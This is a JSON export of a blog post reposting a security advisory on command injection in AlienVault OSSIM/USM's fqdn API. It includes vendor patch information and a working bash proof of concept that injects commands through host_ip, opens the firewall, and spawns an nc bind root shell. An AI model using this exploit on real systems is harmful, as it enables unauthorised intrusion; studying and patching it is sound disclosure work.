{"id":7218,"date":"2017-04-03T14:19:11","date_gmt":"2017-04-03T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/03\/news-1009\/"},"modified":"2017-04-03T14:19:11","modified_gmt":"2017-04-03T22:19:11","slug":"news-1009","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/04\/03\/news-1009\/","title":{"rendered":"SSD Advisory \u2013 AlienVault OSSIM \/ USM Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Mon, 03 Apr 2017 07:29:37 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\" id=\"a-href-3085\">ssd@beyondsecurity.com<\/a><\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a Remote Command Execution vulnerability found in AlienVault OSSIM and USM version 5.3.4 and version 5.3.5.<\/p>\n<p>OSSIM, AlienVault&#8217;s Open Source Security Information and Event Management (SIEM) product, provides you with a feature-rich open source SIEM complete with event collection, normalization and correlation. Launched by security engineers because of the lack of available open source products, OSSIM was created specifically to address the reality many security professionals face: A SIEM, whether it is open source or commercial, is virtually useless without the basic security controls necessary for security visibility.<\/p>\n<p>AlienVault Unified Security Management (USM) is a comprehensive approach to security monitoring, delivered in a unified platform. 
The USM platform includes five essential security capabilities that provide resource-constrained organizations with all the security essentials needed for effective threat detection, incident response, and compliance, in a single pane of glass.<\/p>\n<p>Designed to monitor cloud, hybrid cloud and on-premises environments, AlienVault USM significantly reduces complexity and deployment time so that you can go from installation to first insight in minutes \u2013 talk about fast threat detection!<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> &#8220;We have confirmed that this issue impacts v5.3.4 and v5.3.5 of OSSIM and USM. As a result, we will be pushing a hotfix release (v5.3.6) to all users which will patch this vulnerability.&#8221; For more details, see the release notes published here: <a href=\"https:\/\/www.alienvault.com\/forums\/discussion\/8415\/alienvault-v5-3-6-hotfix-important-update\" target=\"_blank\">https:\/\/www.alienvault.com\/forums\/discussion\/8415\/alienvault-v5-3-6-hotfix-important-update<\/a><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The vulnerability is present in a default installation without any plugins. The function <em>get_fqdn<\/em> does not validate user input.<\/p>\n<p>The function <em>get_fqdn<\/em> executes nslookup (executable=\/bin\/bash nslookup) with the parameter <em>%s<\/em>, where <em>%s<\/em> is the <em>host_ip<\/em> value under the user&#8217;s control. 
A user can concatenate commands to run by adding &#8220;<em>;<\/em>&#8221; to the &#8220;<em>host_ip<\/em>&#8221; parameter.<\/p>\n<p><strong>Proof Of Concept:<\/strong><\/p>\n<pre><code>#!\/bin\/bash\n\nusage() {\n  echo \"Usage: $0 &lt;ip&gt;\"\n}\n\ninfo() {\n  echo \"[+] $1\"\n}\n\nif [ -z \"$1\" ]; then\n  usage &gt;&amp;1\n  exit 1\nfi\n\nIP=\"$1\"\nPORT=8888\n\n# POST to the fqdn endpoint; host_ip carries ';'-separated commands after the address\nnohup curl -ks -XPOST -d 'host_ip=127.0.0.1;\niptables-save &gt; \/tmp\/.rules;\niptables -I INPUT -p tcp --dport '$PORT' -j ACCEPT;\nmkfifo \/tmp\/ncshell;\nsh \/tmp\/ncshell | nc -l -p '$PORT' &gt; \/tmp\/ncshell;\nrm -f \/tmp\/ncshell;\niptables-restore &lt; \/tmp\/.rules;\nrm -f \/tmp\/.rules' \"https:\/\/$IP:40011\/av\/api\/1.0\/system\/local\/network\/fqdn\" &gt;\/dev\/null 2&gt;&amp;1 &amp;\n\ninfo \"Exploit running...\"\nsleep 2\ninfo 'Now you should have your root shell: (^D to exit)'\n\nrc=0\nnc $IP $PORT\ninfo 'Terminated'<\/code><\/pre>\n<\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3085\" target=\"bwo\">https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz | Date: Mon, 03 Apr 2017 07:29:37 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a Remote Command Execution vulnerability found in AlienVault OSSIM and USM version 5.3.4 and version 5.3.5. OSSIM, AlienVault&#8217;s Open Source Security Information and Event Management (SIEM) product, provides you with a feature-rich open source SIEM complete with event collection, normalization and correlation. 
Launched by security engineers because of the &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3085\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 AlienVault OSSIM \/ USM Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757],"class_list":["post-7218","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7218","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7218"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7218\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7218"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}